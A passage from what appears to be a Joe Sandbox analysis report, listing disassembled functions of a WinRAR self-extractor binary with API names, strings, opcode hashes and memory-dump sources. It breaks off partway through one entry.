                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: wcscpy
                                                                                                            • String ID: &nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                            • API String ID: 1284135714-864536935
                                                                                                            • Opcode ID: b809989fe12f67925e71f4c1dd8edc4343e364e1c14117d22da3b6962b917f06
                                                                                                            • Instruction ID: ce178f90d2159982317398913d1e645bc9bd4f3145705cb1ffe4702c3dbffc43
                                                                                                            • Opcode Fuzzy Hash: b809989fe12f67925e71f4c1dd8edc4343e364e1c14117d22da3b6962b917f06
                                                                                                            • Instruction Fuzzy Hash: 4A316357E08647B0EF60BF21E400179D2B6EF50B88FC88031DA4D07699EE7CE586A360
                                                                                                            Function 00007FF7390DCDE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 190COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: abort$CallEncodePointerTranslator
                                                                                                            • String ID: MOC$RCC
                                                                                                            • API String ID: 2889003569-2084237596
                                                                                                            • Opcode ID: efa0151c868aca9567335aef0cf7eb99f595b7c114ce22894b07312cdecd7ffd
                                                                                                            • Instruction ID: 66c11dae1a0ad639c8f621044935a51806374d9632efb28275d3ee1fc6865fec
                                                                                                            • Opcode Fuzzy Hash: efa0151c868aca9567335aef0cf7eb99f595b7c114ce22894b07312cdecd7ffd
                                                                                                            • Instruction Fuzzy Hash: 8691BF73A08796DAE710EF64E8402ADBBB2FB44788F54412AEE8D07B55DF38E195D700
                                                                                                            Function 00007FF7390D4EC0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 145COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemText$Dialog
                                                                                                            • String ID: GETPASSWORD1$Software\WinRAR SFX
                                                                                                            • API String ID: 1770891597-1315819833
                                                                                                            • Opcode ID: 032380212446e9e3a76212182242ed55e14455ba94c0e91f9393e55202c7f02f
                                                                                                            • Instruction ID: 7b3a8a3df08e93fac186cf64f775c4c7ed47986f92f7c27fe5c56f976c83edf9
                                                                                                            • Opcode Fuzzy Hash: 032380212446e9e3a76212182242ed55e14455ba94c0e91f9393e55202c7f02f
                                                                                                            • Instruction Fuzzy Hash: B551B923A18A8366E720AF15E4843B9E3B2FF45784F800131EE8D46B99DF3DD545DB50
                                                                                                            Function 00007FF7390DBF6C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                            • String ID: csm$f
                                                                                                            • API String ID: 2395640692-629598281
                                                                                                            • Opcode ID: f4c1aff224d5910e48a727d51e9af22eebea1a0e2d1c43e0b0c450b4e201961d
                                                                                                            • Instruction ID: 1701e9d51d8a76663f558cafd6fb1bc0480dce9abbc4b37a106e0bf83742ec2a
                                                                                                            • Opcode Fuzzy Hash: f4c1aff224d5910e48a727d51e9af22eebea1a0e2d1c43e0b0c450b4e201961d
                                                                                                            • Instruction Fuzzy Hash: 8751F637A096A3A6DB14EF15E444A39B7B6FB40B88F918134DA0A43748DF39E941E750
                                                                                                            Function 00007FF7390D7A00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemText$DialogWindow
                                                                                                            • String ID: RENAMEDLG
                                                                                                            • API String ID: 445417207-3299779563
                                                                                                            • Opcode ID: dc965d09a174bd4708d94d9bb9f18024b119431b212ab041831bb5fbf7f35311
                                                                                                            • Instruction ID: e76fce70e17af868593afe9b94c370da560eb4cdc9935a84393ea27f5dd27c5f
                                                                                                            • Opcode Fuzzy Hash: dc965d09a174bd4708d94d9bb9f18024b119431b212ab041831bb5fbf7f35311
                                                                                                            • Instruction Fuzzy Hash: A221D262A08B4392F7446F1AB580339A773AB84FC0F884134CE0D17790CF7EE645A320
                                                                                                            Function 00007FF7390D81FC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                            • API String ID: 0-56093855
                                                                                                            • Opcode ID: 1a4f5e6a20bb9cc70eeb4bb789232372df0917a6162a5cfbb097bc42d3b8b643
                                                                                                            • Instruction ID: dcb0cbe685cadcc3c30664f487ffd436f0b59bf4da62d54be290fb9e0f6565d3
                                                                                                            • Opcode Fuzzy Hash: 1a4f5e6a20bb9cc70eeb4bb789232372df0917a6162a5cfbb097bc42d3b8b643
                                                                                                            • Instruction Fuzzy Hash: ED21C721A0DA47B1EA10BF55F8801B9A3B6FB4A788FD40436D88E67264DE7CE545A360
                                                                                                            Function 00007FF7390E307C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                            • Opcode ID: d2d5dee77805ecb0b117ea83281d398e3d03b99349bb268e48010d92f5dc65b4
                                                                                                            • Instruction ID: 305996a48a2e1c3c7bd5d5ca6ee66242d9da43523d03f48826ae4abe287680d5
                                                                                                            • Opcode Fuzzy Hash: d2d5dee77805ecb0b117ea83281d398e3d03b99349bb268e48010d92f5dc65b4
                                                                                                            • Instruction Fuzzy Hash: 08F0A431F19E4BA1EF54AF21E490279A3B2EF88780F841435D90F02254DF3CD884D720
                                                                                                            Function 00007FF7390EBC18 Relevance: 7.7, APIs: 5, Instructions: 203COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                            • String ID:
                                                                                                            • API String ID: 3215553584-0
                                                                                                            • Opcode ID: 9c9de20841d539944c2e2734a215c0db355f363507e383f6c3ea5354cb677a9c
                                                                                                            • Instruction ID: 025ce6ba322e2db627405e0622d952c05e4c1ec94fbd947c66415aca3724e1c5
                                                                                                            • Opcode Fuzzy Hash: 9c9de20841d539944c2e2734a215c0db355f363507e383f6c3ea5354cb677a9c
                                                                                                            • Instruction Fuzzy Hash: C181B222E19A1BA5F760BF6694806BDA7B2BB44B88F844135DE0E137D5DF3CE441E720
                                                                                                            Function 00007FF7390EB58C Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                                            • String ID:
                                                                                                            • API String ID: 3659116390-0
                                                                                                            • Opcode ID: e532793c5c8993de4c02adb75cd1f87544b168029c2ced9a4c779194dd8a1e63
                                                                                                            • Instruction ID: d264adc4c5cb32bcba0e120c85f6cd8d4603c7ec2e4298b970d1b694eaa5810a
                                                                                                            • Opcode Fuzzy Hash: e532793c5c8993de4c02adb75cd1f87544b168029c2ced9a4c779194dd8a1e63
                                                                                                            • Instruction Fuzzy Hash: 2051C032E15E5795E710DF66E4443ACBBB2BB48B98F448135DE8A47A98CF38D181D720
                                                                                                            Function 00007FF7390EC7B4 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _set_statfp
                                                                                                            • String ID:
                                                                                                            • API String ID: 1156100317-0
                                                                                                            • Opcode ID: c8b051e27b68c6b043da78d9bda75542202bddee0f68464aef4353d6aee2ea9e
                                                                                                            • Instruction ID: 456fb4cf7fc7710973bcf77a107224c7da96f52b648deee39464211544701286
                                                                                                            • Opcode Fuzzy Hash: c8b051e27b68c6b043da78d9bda75542202bddee0f68464aef4353d6aee2ea9e
                                                                                                            • Instruction Fuzzy Hash: 7311C433E1CE6F25F6543D28D742379D1636F453A0F884234E97E026D6CF2EE440A125
                                                                                                            Function 00007FF7390D8190 Relevance: 7.5, APIs: 5, Instructions: 29windowsynchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$DispatchObjectPeekSingleTranslateWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 3621893840-0
                                                                                                            • Opcode ID: 019665242f8665fb509ae50145d54e7cf4aa89eff02abeba548199eabc728336
                                                                                                            • Instruction ID: 8446321c49e76c6c27d5659dc89abc3640f27c4fb8d28496c4dd40ec44698e80
                                                                                                            • Opcode Fuzzy Hash: 019665242f8665fb509ae50145d54e7cf4aa89eff02abeba548199eabc728336
                                                                                                            • Instruction Fuzzy Hash: 25F0FF26B2855792F750AF20E495A76A276FFA4B05FC41030EA4F458949E7CD149DB10
                                                                                                            Function 00007FF7390C8DEC Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLastLoadStringswprintf
                                                                                                            • String ID: %ls$%s: %s
                                                                                                            • API String ID: 1667839203-2259941744
                                                                                                            • Opcode ID: 2e37fd5d1039c0864daa14d924a25d1d9870cdbca16d321fd095008006fc1188
                                                                                                            • Instruction ID: f9b20c9d822a102a1540b4c86c357bb8c21cf17a67baa03214c01d088daf6c4d
                                                                                                            • Opcode Fuzzy Hash: 2e37fd5d1039c0864daa14d924a25d1d9870cdbca16d321fd095008006fc1188
                                                                                                            • Instruction Fuzzy Hash: 29913A21E0C143A1F6683D2885A92BD8173AF82740ED4413ADBCF1E7D5DD1CED01BA3A
                                                                                                            Function 00007FF7390DD35C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __except_validate_context_recordabort
                                                                                                            • String ID: csm$csm
                                                                                                            • API String ID: 746414643-3733052814
                                                                                                            • Opcode ID: 2b38a1de481d78321f7277880c8bed003ac38ba3934367e6007bb91629b7ca46
                                                                                                            • Instruction ID: 5555f751c05b1ee054961e869c3c3e46e8b3e96775d81fe9c862ceae7f520d00
                                                                                                            • Opcode Fuzzy Hash: 2b38a1de481d78321f7277880c8bed003ac38ba3934367e6007bb91629b7ca46
                                                                                                            • Instruction Fuzzy Hash: A671CF73908683D6DB60AF259450779BBF2FB04B88F948136EA5C87A89CF2CE550E750
                                                                                                            Function 00007FF7390CA560 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Concurrency::cancel_current_task
                                                                                                            • String ID: yxxxxxxx$yxxxxxxx
                                                                                                            • API String ID: 118556049-3283245749
                                                                                                            • Opcode ID: 19f8a2ebfd476ad198ef74e43ba7d85404d3486d67bee46a41fb2f9f205f2f79
                                                                                                            • Instruction ID: e8391f262a422de834570e6832461cdb0cc68bf8eaf3f856760674c6f50bd5ac
                                                                                                            • Opcode Fuzzy Hash: 19f8a2ebfd476ad198ef74e43ba7d85404d3486d67bee46a41fb2f9f205f2f79
                                                                                                            • Instruction Fuzzy Hash: 53513962B0464792FD04EF46A9452B9D6A6BB44FD0F94C532EECE0FB95DD3CE0829700
                                                                                                            Function 00007FF7390DD7A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 117COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFrameInfo__except_validate_context_recordabort
                                                                                                            • String ID: csm
                                                                                                            • API String ID: 2466640111-1018135373
                                                                                                            • Opcode ID: 5993ee1f3451b0f914cc0e1c5361945c7b5c9d301905bc6f0d74f68e28de466c
                                                                                                            • Instruction ID: f9a12d8ff6aa13dc7002652a8115d842e1a0e9e4c087a87269dd94a81ede4f1f
                                                                                                            • Opcode Fuzzy Hash: 5993ee1f3451b0f914cc0e1c5361945c7b5c9d301905bc6f0d74f68e28de466c
                                                                                                            • Instruction Fuzzy Hash: 2D517B33618792A6E620FF26E04126EB7B5FB89B90F441535EB8D07B55CF38E460EB10
                                                                                                            Function 00007FF7390EB9B8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                            • String ID: U
                                                                                                            • API String ID: 2456169464-4171548499
                                                                                                            • Opcode ID: 8b814458cd7cc5fbb2d187b6083f2fc6c65188a1ec630b64749929fbcfb4944a
                                                                                                            • Instruction ID: 098439b8e31a426c46d3b58f067c16bfc0289591a28f8491875ea189d6cef95c
                                                                                                            • Opcode Fuzzy Hash: 8b814458cd7cc5fbb2d187b6083f2fc6c65188a1ec630b64749929fbcfb4944a
                                                                                                            • Instruction Fuzzy Hash: A141A232B19A4792EB209F16E4443BAA7B2FB88794F844031EE4D87798DF7CD541D750
                                                                                                            Function 00007FF7390D44B8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
